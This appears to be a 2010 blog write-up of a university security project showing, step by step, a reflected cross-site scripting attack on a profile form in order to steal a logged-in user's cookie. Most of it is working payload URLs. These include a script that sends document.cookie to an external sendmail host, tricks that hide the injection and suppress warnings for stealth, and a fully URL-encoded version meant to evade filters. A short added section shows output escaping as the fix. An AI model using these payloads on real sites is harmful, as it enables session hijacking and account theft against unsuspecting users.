
Attack A: Stealing Cookie

Consider an input form on this website:

<form name="profileform" method="GET"
  action="users.php">
 <nobr>User:
 <input type="text" name="user" value="" size=10>
 <input type="submit" value="View"></nobr>
</form>

Assume that a user has already logged in to the website and comes across a malicious link which, when clicked, invokes a sendmail script that sends the user's cookie to the attacker's email. How would such a malicious link be constructed?

1. Study the form

If we submit the form, it goes back to its own page (users.php) and shows the profile like this:

<form name="profileform" method="GET"
  action="/teaching/10WS/Security/material/projects/project2/peanut/users.php">
 <nobr>User:
 <input type="text" name="user" value="2534130" size=10>
 <input type="submit" value="View"></nobr>
</form>

The important thing to note is that the submitted value is echoed back into the user input field (see the value attribute). Another important detail is that the form uses the GET method, so the address bar shows users.php?user=2534130. To exploit this, we need one vital element: a script.

2. Invoking script

Code in a <script> tag in the body of an HTML page that is not wrapped in a function is executed automatically, just like a normal program. So, let's test an input that alerts the user's cookie. Type:

users.php?user=""><script>alert(document.cookie);</script>

This alerts the user's cookie right away, with the side effect of a formatting error on the page. It works because, when you enter the URL like that, the user input field is rewritten to:

<form name="profileform" method="GET"
  action="users.php">
 <nobr>User:
 <input type="text" name="user" value=""><script>alert(document.cookie);</script>" size=10>
 <input type="submit" value="View"></nobr>
</form>

As you can see, we successfully closed the user input field tag and planted our script tag in the page. However, the trailing text makes the page look like it has been hacked. A good hacker has to maintain stealthiness in compromising security, so let's take care of that.

3. Cleaning the page

Now we have to overwrite the user input field to emulate the real page, so that the user won't notice the subtle differences (unless he looks at the address bar). So cover the user input field with this:

users.php?user="size="10"> <input type="submit" value="View">

The important thing is that we have now emulated the real page with our own user input field and View button. However, the trailing script also needs to be hidden from the user. We could use <!-- to comment out all the trailing script, but that means commenting until the end of the HTML, which clearly is not how the original site is designed. How about using a <div> tag and making it invisible with display:none as the style? So, here's our code to clean the page:

users.php?user="size="10"><script>alert(document.cookie);</script><input type="submit" value="View"><div style="display:none;" xx="

Now the nasty trailing script is enveloped in the <div> tag and will not be shown on the page. The xx=" attribute doesn't mean anything; it is only there to close off the remaining text:

" size=10>
 <input type="submit" value="View"></nobr>

4. Send the cookie by email

Once your stealth attack is ready, you are good to go. Find a sendmail script to send the cookie to your email. I'm using my university's sendmail script, which looks like this:

javascript:void((new%20Image()).src=('http://mail-infsec.cs.uni-saarland.de:8000/sendmail.php?'%20+%20'to=somestudent@stud.uni-saarland.de'%20+%20'&payload=xyz'%20+%20'&random='%20+%20Math.random()));

However, you can find a dozen free sendmail scripts for your comfort in hacking the website. Now, put the script in your code:

users.php?user=" size="10"> <input type="submit" value="View"><style type="text/css">.warning{display:none;}</style><script type="text/javascript"><!--
(new Image()).src='http://mail-infsec.cs.uni-saarland.de:8000/sendmail.php?to=s9sowind@stud.uni-saarland.de&payload='+encodeURIComponent(document.cookie)+'&random='+Math.random();
//+--></script><div style="display:none;" xx="

The to parameter is the email address you want to send the cookie to, and payload is the content of the email, which is the document cookie. The random parameter is just a way to avoid caching.

5. Precaution on warning

Some websites may display a warning if there is an SQL error, so you must also cover that by using:

<style type="text/css">.warning{display:none;}</style>

This overrides the CSS class used for displaying warnings on the page. I do this because the page uses a stylesheet that gives the warning text a red, bold style with:

.warning { color: #A00000; font-weight: bold; }

Now, the warning can be suppressed beautifully.

6. Precaution on user input

To make sure the attack succeeds, you might want to consider URL encoding in case the user input field is lightly filtered for quotes, tags, spaces, and other characters. Convert all the special characters so that the URL looks like this:

users.php?user=%22%20size%3D%2210%22%3E%20%3Cinput%20type=%22submit%22%20value=%22View%22%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E.warning{display%3Anone%3B}%3C%2Fstyle%3E%3Cscript%20type%3D%22text%2Fjavascript%22%3E%3C!--%0A%28new%20Image%28%29%29.src%3D%27http%3A%2F%2Fmail-infsec.cs.uni-saarland.de:8000%2Fsendmail.php%3Fto%3Dsomeone%40stud.uni-saarland.de%26payload%3D%27%2BencodeURIComponent%28document.cookie%29%2B%27%26random%3D%27%2BMath.random%28%29%3B%0A%2F%2F+--%3E%3C%2Fscript%3E%3Cdiv%20style%3D%22display%3Anone%3B%22%20xx%3D%22

Now you are set to hack the website, but of course you have to figure out a way to get the user to click the link first ^^
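
Seen from the server side, steps 2 and 6 come down to one missing output-escaping call. The following is an added example, not code from the original post or the site it describes: a Node.js stand-in for the users.php template, with hypothetical function names and a constructed URL on site.example carrying the alert test string from step 2 in percent-encoded form.

```javascript
// Added example: Node.js stand-in for the users.php template (hypothetical names).
// Constructed sample: the step 2 test string, percent-encoded as in step 6.
const SAMPLE_URL =
  'http://site.example/users.php?user=%22%3E%3Cscript%3Ealert(document.cookie);%3C%2Fscript%3E';

// Vulnerable rendering: the parameter is pasted into the value attribute as-is.
function renderUnsafe(user) {
  return `<input type="text" name="user" value="${user}" size=10>`;
}

// Escape the five characters that can end an attribute value or open a tag.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: same template, value escaped at output time.
function renderSafe(user) {
  return `<input type="text" name="user" value="${escapeHtml(user)}" size=10>`;
}

// The application receives the percent-decoded parameter, so a filter that
// looks for literal quotes or angle brackets in the raw URL never matches.
function userParam(url) {
  return new URL(url).searchParams.get('user') ?? '';
}

// Rough check for this demo only: count opening tags in the rendered HTML.
// More than one means the value escaped from the attribute.
function countTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

function demo() {
  const user = userParam(SAMPLE_URL);
  return {
    rawUrlHasQuote: SAMPLE_URL.includes('"'),
    decoded: user,
    unsafeTags: countTags(renderUnsafe(user)),
    safeTags: countTags(renderSafe(user)),
    safeHtml: renderSafe(user),
  };
}

console.log(demo());
```

The escaped version keeps the whole string inside the value attribute, so the browser shows it as text in the input box and no second tag is created.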

  1. November 28, 2010 at 9:04 pm
